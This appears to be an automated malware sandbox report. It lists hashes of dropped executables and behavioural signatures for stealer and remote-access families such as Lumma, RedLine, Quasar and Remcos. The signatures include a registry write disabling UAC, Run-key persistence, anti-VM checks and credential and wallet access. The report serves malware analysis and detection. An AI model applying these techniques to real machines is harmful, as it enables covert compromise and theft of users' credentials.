| SHA1 | 72553e1b3a759c17f54e7b568f39b3f8f1b1cdbe |
| SHA256 | 4a553c39728410eb0ebd5e530fc47ef1bdf4b11848a69889e8301974fc26cde2 |
| SHA512 | 5871e2925ca8375f3c3ce368c05eb67796e1fbec80649d3cc9c39b57ee33f46476d38d3ea8335e2f5518c79f27411a568209f9f6ef38a56650c7436bbaa3f909 |
C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe
| MD5 | e30340895091ee6f449576966e8448fb |
| SHA1 | 4ccb079e7eedbf7113a803c6859241bb56978b4f |
| SHA256 | 126d9d9886f57e39642744a8bf62681577fbee52b88fba4c4c5097b04501eade |
| SHA512 | c9116fc043e188b50294ebf8f3b661c55d73735773f61d90ae6d2f1ad06f84aabeb80953a7cddce7e7f75cefd979f16d684c81dd853bd0673536252882a6e0ee |
C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe
| MD5 | 23544090c6d379e3eca7343c4f05d4d2 |
| SHA1 | c9250e363790a573e9921a68b7abe64f27e63df1 |
| SHA256 | b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56 |
| SHA512 | 6aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c |
C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
| MD5 | 2e87d4e593da9635c26553f5d5af389a |
| SHA1 | 64fad232e197d1bf0091db37e137ef722024b497 |
| SHA256 | 561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8 |
| SHA512 | 0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3 |
memory/11116-33381-0x0000000000190000-0x00000000001E4000-memory.dmp
memory/13096-33683-0x00000000063C0000-0x0000000006714000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\050598569159
| MD5 | f693ab0c91796a471eb5fc701a02ef33 |
| SHA1 | 8f64112e239be6b1badeffb8e499711c9d9fd1ad |
| SHA256 | 7bf64ff61b8bc71419511801afeced998719ea48569936326037c61109fcd691 |
| SHA512 | c1e70812b6fa143f06232a9e9702ee9d42185fffdae82cafde4d3752fdb06d86f6e84ad816a6cc85dc58b24960cc344f8652b258cd6a424d0eff217fc5b4cfe0 |
Analysis: behavioral4
Detonation Overview
| Submitted | 2024-12-12 18:20 |
| Reported | 2024-12-12 18:25 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 149s |
| Max time network | 273s |
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
| Submitted | 2024-12-12 18:20 |
| Reported | 2024-12-12 18:25 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 161s |
| Max time network | 301s |
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RMS
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1384 created 1324 | N/A | N/A | C:\Windows\System32\Wbem\wmic.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3312 created 3548 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 5416 created 3548 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 4528 created 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2036 created 1648 | N/A | C:\Windows\System32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe |
| PID 4072 created 3712 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\SysWOW64\ruts\rutserv.exe |
| PID 2036 created 1324 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2036 created 3520 | N/A | C:\Windows\System32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\boleto | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
